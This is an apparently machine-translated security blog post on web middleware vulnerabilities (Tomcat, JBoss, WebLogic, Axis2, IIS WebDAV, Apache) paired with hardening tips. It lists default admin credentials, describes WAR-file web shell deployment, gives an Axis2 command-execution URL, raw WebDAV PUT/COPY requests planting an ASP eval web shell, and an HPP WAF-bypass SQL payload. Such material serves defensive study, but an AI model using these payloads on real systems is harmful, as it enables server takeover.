Talking about middleware vulnerability and protection

Appreciation and appreciation, thick and thin hair

The middleware vulnerability can be said to be the most vulnerable vulnerability to web administrators. The reason is very simple, because this is not a vulnerability in the application code, but is caused by improper configuration or improper use of an application deployment environment. From the actual situation, the biggest difficulty in preventing such a loophole is who is responsible for the security of middleware?

In addition, developers and operation and maintenance personnel are also an important factor in the lack of security awareness of middleware. Some developers may perform security testing on their own code, but it is not enough to only review the code. This article is used to record some common web middleware vulnerabilities and protection issues (only part of the record, not all), part of which is taken from Doug’s book “White Hat Saying Web Security”, which is considered as a reading note or a post-reading .

Middleware, containers, servers are silly and unclear?

When talking about the security of middleware, I feel that it is necessary to sort out the above relationships and concepts. When I was exposed to these concepts, my mind was a mess, and the concepts of middleware, containers, servers, webservers, etc. felt very similar to each other, but they were different. Therefore, when writing this article, I deliberately searched some information, trying to sort out the relationship between these people, refer to the article: http://www.voidcn.com/blog/saoraozhe3hao/article/p-2428756. Html

Basic concepts and functions

Only the web middleware, web server, and web container are introduced here, because the concept can be extended to a database or the like in addition to the web.

web server

The web server is used to provide the http service, that is, to return information to the client, which can process the HTTP protocol, respond to requests for static pages or pictures, control page jumps, or delegate dynamic requests to other programs (middleware programs).

web middleware

Web middleware is used to provide a connection between system software and application software to facilitate communication between various components of the software, which can provide a container for one or more applications.

web container

The web container is used to provide an environment for the application components (JSP, SERVLET) in it, which is an integral part of the middleware, which implements the parsing of dynamic languages. For example, tomcat can parse jsp because it has a jsp container inside.

belongs to the category

Web server: IIS, Apache, nginx, tomcat, weblogic, websphere, etc.
Web middleware: apache tomcat, BEA WebLogic, IBM WebSphere, etc.
Web container: JSP container, SERVLET container, ASP container, etc.

Note: web middleware and web server overlap, because web middleware such as tomcat also has the function of web server.

Key Analysis

The web server simply provides static web page parsing (such as apache) or a service that provides a jump. The web middleware (which contains the web container) can parse the dynamic language. For example, tomcat can parse jsp (because tomcat contains jsp container), of course, it can also parse static resources, so it is both web middleware and web server. However, tomcat parses static resources not as fast as apache, so it is often used in combination.

Tomcat Vulnerabilities and Protection

Tomcat is a middleware software of apache, which can provide jsp or php parsing service. In order to facilitate remote management and deployment, after installing tomcat, there will be a management page by default. The administrator only needs to upload a file in WAR format remotely. The content can be published to the website. This feature is convenient for administrators and also opens the door for hackers. In addition, tomcat has some sample pages, which can lead to security problems if not handled properly.

tomcat Remote Deployment Vulnerability Details

The tomcat management address is usually:

1
Http://localhost:8080/manager

Default account password:

1
2
3
4
root/root
tomcat/tomcat
admin admin
admin 123456

tomcat password blasting

Blasting is invalid when the default is not configured for tomcat, and it can be blasted if the account password is set. Tomcat authentication is weak, Base64 (username: password) encoding, if the request response code is not 401 (unauthorized: access is denied due to invalid credentials), indicating that the login is successful. After the login is successful, you can directly upload the war file, getshell (of course uploading the war file requires manager permission)

getshell process

First package our .jsp shell file as a war file:

1
jar -cvf shell.war shell.jsp

After logging in to the administration page, select Upload war file.

The directory in the middle of the screenshot is the Trojan file after the upload is successful, you can click to browse.

Access shell.jsp directly in the current directory.

Session Example sample page

default address:

1
http://localhost/servlets-examples/servlet/SessionExample

Used to set any session variable, malicious use can cause damage to the application.

tomcat vulnerability protection

  • Upgrade tomcat version
  • Delete the remote deployment page or restrict access to the page.
  • Find /conf/tomcat-users.xml to change the username and password and permissions.
  • Delete sample page file

JBoss Vulnerability and Protection

JBoss is a JavaEE-based application server. Similar to tomcat, jboss also has a remote deployment platform, but does not require login. The exploit process is similar to tomcat, so there is no longer a screenshot. In addition to remote deployment vulnerabilities, jboss also has a deserialization vulnerability, which is not detailed here.

JBoss Remote Deployment Vulnerability Details

Default management background address:

1
http://localhost:8080

getshell process

Visit the administration page and view the JMX Console in the jboss configuration page. This is the JBoss management console program. After entering, find the Jboss.deployment package. The package has the flavor=URL.type=DeploymentSccanner option. After entering the deployment page, you can upload the war file, but unlike tomcat, it is not a local upload war file, but a remote address download, so you need to prepare a file server for remote download war to the target jboss server. The specific method is to find the “ADDURL” method on the deployment page, enter the URL address, and click on invoke. In addition to the above methods, the BSH method provided by JMX-Console can also deploy the war package.

JBoss vulnerability protection

  • Open jmx-console password authentication
  • Remove jmx-console.war and web-console.war

WebLogic Vulnerability and Protection

Weblogic is a middleware based on JavaEE architecture. After installing weblogic, it will listen to port 7001 by default. The exploit process is similar to tomcat, so there is no longer a screenshot.

Weblogic Remote Deployment Vulnerability Details

Default background address:

1
http://localhost:7001/console/login/loginForm.jsp

account password:

  • Username and password are: weblogic
  • Username and password are: system
  • Username and password are: portaladmin
  • Username and password are: guest

getshell process

After successfully logging into the weblogic background, find the deployment button, click to select the installation, and then you can select the local upload war package or use the remote url to download. After the deployment is complete, weblogic will give the file address.

Weblogic vulnerability protection

  • Delete remote deployment page

axis2Vulnerabilities & Protection

Axis2 is also a project of apache, a new generation of SOAP engine with an arbitrary command execution vulnerability. (The vulnerability is from the Tiantian platform)

axis2Command Execution Vulnerability Details

Default background address:

1
http://localhost/axis2-admin/

Default account password: admin and axis2
After login, the effect is as follows:

Execution system command poc

1
http://localhost/services/Axis2Shell/execCmd?cmd=whoami

IIS Vulnerabilities and Protection

IIS is a web server from Microsoft. It is easy to generate webdav vulnerability if it is not properly configured. Webdav itself is an extension of iis. After opening, you can use some request types other than get and post, such as put. However, if it is not properly configured, it will lead to a file upload vulnerability. In addition to the webdav vulnerability, a remote command execution vulnerability has recently emerged, specifically: [IIS6.0 Remote Command Execution Vulnerability (CVE-2017-7269)] (http://thief.one/2017/03/29/ IIS6-0%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4% 9E-CVE-2017-7269/)

IIS Webdav Vulnerability Details

When testing a site for a webdav vulnerability, you can construct an OPTIONS request first. If you return 200, you can see which methods are included in the Allow parameter of the return header (can be requested).

1
2
OPTIONS / HTTP/1.1
Host:thief.one

If there is a PUT method, you can try to write a txt file.

1
2
3
4
5
PUT /shell.txt HTTP/1.1
HOST:thief.one
Content-length:30
<%eval request("nmask")%>

If you return 200, the upload is successful. You can manually access this file to confirm whether it exists. Of course, it is also possible to return 403, which means that this directory does not have the permission to upload, you can try to upload to other directories.
Change the file suffix name by MOVE or COPY method.

1
2
3
COPY /shell.txt HTTP/1.1
HOST:thief.one
Destination:http://thief.one/shell.asp

IIS vulnerability protection

  • Turn off webdav function

Apache Vulnerabilities and Protection

There are also some vulnerabilities in Apache itself, such as the slowhttp vulnerability. Of course, the official believes that it is a feature of Apache and is not a loophole. However, it turns out that its harm is really great. In addition to the slowhttp vulnerability, its third-party moudle has many vulnerabilities in deserialization or remote command execution.

Apache slowhttp Vulnerability Details

Please refer to the slowhttp vulnerability: [Talk about DDOS attacks and defenses] (http://thief.one/2017/05/10/1/)

HPP Vulnerability

The HPP vulnerability is a problem when the web container handles http parameters. The previous web servers have more or less such problems.

1
2
3
4
<?php
$str=$_REQUEST['str']; The #$_REQUEST[] function accepts GET/POST.
Echo $str;
?>

For example, access the URL:

1
http://www.xxx.com/index.php?str=hello

At this point the page shows hello
But if you visit:

1
http://www.xxx.com/index.php?str=hello&str=world&str=nmask

At this point, the page displays nmask, which overwrites the value of the previous parameter. This is the http parameter pollution.

Using the scene

Bypass WAF, such as:

1
PHP:index.php?str=1&str=select * from admin --

Because WAF may check the first word of the value, if it is select, it will trigger, so that it can avoid being triggered.

Portal

In addition to these vulnerabilities, the web server has some vulnerabilities in parsing dynamic languages. Step by step: [Server Parsing Vulnerability | nMask’Blog] (http://thief.one/2016/09/21/%E6%9C %8D%E5%8A%A1%E5%99%A8%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E/)

本文标题:Talking about middleware vulnerability and protection

文章作者:nmask

发布时间:2017年05月25日 - 10:05

最后更新:2019年08月16日 - 14:08

原始链接:https://thief.one/2017/05/25/01/en/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

nmask wechat
欢迎您扫一扫上面的微信公众号,订阅我的博客!
坚持原创技术分享,您的支持将鼓励我继续创作!

热门文章推荐: